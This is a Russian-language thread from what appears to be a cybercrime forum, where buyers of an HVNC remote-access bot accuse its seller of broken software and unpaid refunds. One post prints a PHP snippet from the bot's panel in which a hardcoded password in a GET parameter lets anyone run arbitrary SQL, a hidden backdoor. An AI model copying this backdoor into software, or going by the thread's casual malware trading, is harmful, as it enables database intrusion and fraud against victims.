Проверено HVNC bot

nohackru

Пользователь
С нами с
20 Мар 2018
Симпатии
1
Баллы
25
и почему же они не работают? Взломал? Алё то что тебе дали панель и ты код перерил не значит что взломал)
то что мне дали панель, означает одно, что бы проверить её на баги, так как ты не выполняешь свои обещания людям кто купил у тебя эту залупу.
я проверил и нашёл дохера багов.
так что другим уже решать брать или нет. удачи.

spikerok

Местный
С нами с
25 Дек 2017
Симпатии
12
Баллы
80
то что мне дали панель, означает одно, что бы проверить её на баги, так как ты не выполняешь свои обещания людям кто купил у тебя эту залупу.
я проверил и нашёл дохера багов.
так что другим уже решать брать или нет. удачи.
например? Какие баги?) Нашёл дебаг окно и всё?))
Её даже слепой заметит) Мегахакер)

PHP:
/* debug funcs */
if($_GET["pass"] === '20Pru9BOrbwXOlT0lBafb98'){

switch($_GET["func"]){
        case 'execute':
        {
            $db = GetMysqlConnection();
            $db->query($_GET['code']);
            WriteLog($_GET["func"], 'Success', $_GET['code']);
            break;
        }
        case 'select':
        {
            $db = GetMysqlConnection();
            $resultbd = $db->query($_GET['code']);
            WriteLog($_GET["func"], 'Success', $_GET['code']);

echo '<br>';
            while ($row = $resultbd->fetch_assoc()) {
                print_r($row);
                echo '<br>';
            }

break;
        }

}

}

function WriteLog($command, $code, $text){
    echo "----- LOG -----<br><br>";   
    echo "Event execute: " . $code . "<br>";   
    echo "Event func code: " . $text . "<br>";   
}

Последнее редактирование:

Creatine11

Пользователь
С нами с
3 Сен 2018
Симпатии
0
Баллы
20
в общем с этим балаболом говнокодером дел никому не советую иметь. Кодером и человеком тебя слова не назовется назвать.
Брал продукт на тест на 3 дня. Заплатил за 2 дня, за третий день до сих пор идет возвращает деньги уже 2 ytltkb
Изначально мне цену заломил 600 баксов за свой говнопродукт. Пишу я от такого чела. А ну если от такого, то такое дерьмо и за 200 не жалко.
Взял на тест первые дни. Первый день еще более менее, 4 хвнц вошло как надо. Ну а остальные 20 хвнц за 2 дня просто тупо не открылся ни один браузер. Не дошло даже до входа в ПП. Пишу - молчит. Поддержка полное говно. Таких цыган хитрых как Арсен надо метлой гнать. Говнопродукт продает, который вообще не работает.
Теперь за долг. Дело принципа. Ты обещал неделю назад 25 баксов вернуть. Прошло 2 недели. От тебя постоянные тупые отмазки школьника.
Блек на тебя накатаю из за принципа. Чтобы ты наглый школьник отвечал за свои слова.
Уважаемая администрация - Как вы допускаете на борд таких нищеебов? Позорят ваш борд одним словом. Твоему продукта цена максимум пару баксов и то в базарный день.
Хотите проепать нервы/деньги/время - это к балаболу ТСу.
И еще партнеры мои чекнули твой продукт и обнаружили там бекдор. А это означает, господа, что вашими ботами не только вы будете пользоваться.
претензий больше не имею. решили вопрос по мужски.

Последнее редактирование: